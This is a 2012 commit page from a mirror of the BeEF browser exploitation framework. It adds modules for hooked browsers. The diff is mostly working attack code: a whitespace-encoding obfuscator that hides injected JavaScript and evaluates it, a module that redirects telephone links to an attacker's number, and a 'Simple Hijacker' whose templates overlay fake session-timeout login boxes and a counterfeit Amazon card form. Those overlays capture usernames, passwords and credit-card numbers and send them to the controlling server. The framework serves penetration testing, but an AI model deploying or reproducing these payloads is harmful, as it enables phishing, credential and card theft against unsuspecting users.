Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/beefproject/beef

Browse Source
This commit is contained in:
antisnatchor
2012-09-07 08:41:13 +01:00
parent 5fc56a9dfa 45b839d970
commit 0dd06d6ecb
20 changed files with 513 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files

19
core/main/client/browser.js
View File

@@ -605,8 +605,8 @@ beef.browser = {
* Checks if the Phonegap API is available from the hooked domain.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasJava()) { ... }
*/
* @example: if(beef.browser.hasPhonegap()) { ... }
*/
hasPhonegap: function() {
var result = false;
try { if (!!device.phonegap) result = true; else result = false; }
@@ -614,6 +614,21 @@ beef.browser = {
return result;
},
/**
* Checks if the browser supports CORS
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasCors()) { ... }
*/
hasCors: function() {
if ('withCredentials' in new XMLHttpRequest())
return true;
else if (typeof XDomainRequest !== "undefined")
return true;
else
return false;
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.

25
core/main/client/dom.js
View File

@@ -194,6 +194,31 @@ beef.dom = {
return count;
},
/**
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param: {String} new_number: the new link telephone number to be written
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]

3
core/main/handlers/modules/beefjs.rb
View File

@@ -104,8 +104,7 @@ module BeEF
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end

9
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -591,12 +591,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# append the number of command modules so the branch name results in: "<category name> (num)"
parent.each {|command_module_branch|
if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children')
num_of_command_modules = command_module_branch['children'].length
command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
num_of_subs = 0
command_module_branch['children'].each {|c|
#add in the submodules and subtract 1 for the folder node
num_of_subs+=c['children'].length-1 if c.has_key?('children')
retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder'
}
num_of_command_modules = command_module_branch['children'].length + num_of_subs
command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
end
}
end

5
extensions/evasion/config.yaml
View File

@@ -16,7 +16,7 @@
beef:
extension:
evasion:
enable: true
enable: true
name: 'Evasion'
authors: ["antisnatchor"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
@@ -26,4 +26,5 @@ beef:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble", "minify"]
#chain: ["scramble", "minify"]
chain: ["minify", "base64", "whitespace"]

1
extensions/evasion/extension.rb
View File

@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
require 'extensions/evasion/obfuscation/scramble'
require 'extensions/evasion/obfuscation/minify'
require 'extensions/evasion/obfuscation/base_64'
require 'extensions/evasion/obfuscation/whitespace'

68
extensions/evasion/obfuscation/whitespace.rb Normal file
View File

@@ -0,0 +1,68 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Evasion
class Whitespace
include Singleton
def need_bootstrap
true
end
def get_bootstrap
# the decode function is in plain text - called IE-spacer - because trolling is always a good idea
decode_function =
"//Dirty IE6 whitespace bug hack
function IE_spacer(css_space) {
var spacer = '';
for(y = 0; y < css_space.length/8; y++)
{
v = 0;
for(x = 0; x < 8; x++)
{
if(css_space.charCodeAt(x+(y*8)) > 9)
{
v++;
}
if(x != 7)
{
v = v << 1;
}
}
spacer += String.fromCharCode(v);
}return spacer;
}"
end
def execute(input, config)
size = input.length
encoded = encode(input)
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
input
end
def encode(input)
output = input.unpack('B*')
output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ')
output
end
end
end
end
end

24
modules/browser/hooked_domain/link_rewrite_tel/command.js Normal file
View File

@@ -0,0 +1,24 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var tel_number = "<%= @tel_number %>";
var selector = "a";
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number);
});

25
modules/browser/hooked_domain/link_rewrite_tel/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
link_rewrite_tel:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (TEL)"
description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice."
authors: ["bcoles"]
target:
working: ["ALL"]

28
modules/browser/hooked_domain/link_rewrite_tel/module.rb Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Link_rewrite_tel < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

7
modules/browser/lcamtuf_download/command.js → modules/social_engineering/lcamtuf_download/command.js
View File

@@ -21,12 +21,11 @@ beef.execute(function() {
function doit() {
if (navigator.userAgent.indexOf('MSIE') == -1){
if (!beef.browser.isIE()) {
w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=' + realurl + '">', 'foo');
setTimeout(donext, 4500);
}
}
function donext() {
window.open(maliciousurl, 'foo');
@@ -34,5 +33,5 @@ beef.execute(function() {
once = true;
}
doit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command executed");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
});

2
modules/browser/lcamtuf_download/config.yaml → modules/social_engineering/lcamtuf_download/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
lcamtuf_download:
enable: true
category: "Browser"
category: "Social Engineering"
name: "Lcamtuf Download"
description: "This module will attempt to execute a lcamtuf download. The file will be served with an alternative <i>Content-Disposition: attachment</i> header. For more information please refer to <a href='http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html'>http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html</a> ."
authors: ["Bart Leppens"]

3
modules/browser/lcamtuf_download/module.rb → modules/social_engineering/lcamtuf_download/module.rb
View File

@@ -18,7 +18,6 @@ class Lcamtuf_download < BeEF::Core::Command
# set and return all options for this module
def self.options
return [{
'name' => 'real_file_uri',
'description' => 'The web accessible URI for the real file.',
@@ -33,7 +32,7 @@ class Lcamtuf_download < BeEF::Core::Command
'value' => '',
'width' => '300px'
},
{ 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Once', 'store_type' => 'arraystore',
{ 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore',
'store_fields' => ['do_once'], 'store_data' => [['false'],['true']],
'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true
}]

43
modules/social_engineering/simple_hijacker/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
hijack = function(){
function send(answer){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
}
<% target = @targets.split(',') %>
$j('a').click(function(e) {
e.preventDefault();
if ($j(this).attr('href') != '')
{
if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{
<%
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
file = File.open(tplpath, "r")
@template = file.read
%>
<%= @template %>
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
}
}
});
}
beef.execute(function() {
hijack();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
});

26
modules/social_engineering/simple_hijacker/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
simple_hijacker:
enable: true
category: "Social Engineering"
name: "Simple Hijacker"
description: "Hijack clicks on links to display what you want."
templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
authors: ["gallypette"]
target:
user_notify: ['ALL']

48
modules/social_engineering/simple_hijacker/module.rb Normal file
View File

@@ -0,0 +1,48 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Simple_hijacker < BeEF::Core::Command
def self.options
config = BeEF::Core::Configuration.instance
@templates = config.get('beef.module.simple_hijacker.templates')
# Defines which domains to target
data = []
data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
# We'll then list all templates available
tmptpl = []
@templates.each{ |template|
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
tmptpl<<[ template]
}
data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
return data
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
save({'answer' => @datastore['answer']})
end
end

28
modules/social_engineering/simple_hijacker/templates/amazon.js Normal file
View File

@@ -0,0 +1,28 @@
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = 'no';
document.documentElement.style.overflow = 'hidden';
collect = function(){
answer = "";
$j(":input").each(function() {
answer += " "+$j(this).attr("name")+":"+$j(this).val();
});
send(answer);
}
// floating div
function writediv() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'hax');
sneakydiv.setAttribute('display', 'block');
sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
document.body.appendChild(sneakydiv);
sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>&gt;</b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans>&nbsp; Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select>&nbsp;<select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>';
}
writediv();
$j("#confirm").click(function () {
$j('#hax').remove();
});

50
modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js Normal file
View File

File diff suppressed because one or more lines are too long

10
modules/social_engineering/simple_hijacker/templates/confirmbox.js Normal file
View File

@@ -0,0 +1,10 @@
var answer = confirm("Do you really want to leave us ??")
if (answer){
alert("Okay :(")
send("User chose to leave.");
window.location = $j(this).attr('href');
}
else{
alert("Okay enjoy ")
send("User chose to stay.");
}

105
modules/social_engineering/simple_hijacker/templates/credential.js Normal file
View File

@@ -0,0 +1,105 @@
imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
var answer= '';
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = 'no';
document.documentElement.style.overflow = 'hidden';
// set up darkening
function grayOut(vis, options) {
// Pass true to gray out screen, false to ungray
// options are optional. This is a JSON object with the following (optional) properties
// opacity:0-100 // Lower number = less grayout higher = more of a blackout
// zindex: # // HTML elements with a higher zindex appear on top of the gray out
// bgcolor: (#xxxxxx) // Standard RGB Hex color code
// grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
// Because options is JSON opacity/zindex/bgcolor are all optional and can appear
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
}
// function to send response
function win(){
document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
}
// perform darkening
grayOut(true);
function checker(){
processval = document.body.lastChild.getElementsByTagName("input")[2].value;
if (processval == "Processing..") {
uname = document.body.lastChild.getElementsByTagName("input")[0].value;
pass = document.body.lastChild.getElementsByTagName("input")[1].value;
answer = uname+":"+pass
send(answer);
// set lastchild invisible
document.body.lastChild.setAttribute('style','display:none');
// lighten screen
grayOut(false);
clearInterval(credgrabber);
$j('#hax').remove();
$j('#darkenScreenObject').remove();
}
}
// floating div
function writeit() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'hax');
sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center');
document.body.appendChild(sneakydiv);
sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
credgrabber = setInterval(checker,1000);
}
writeit();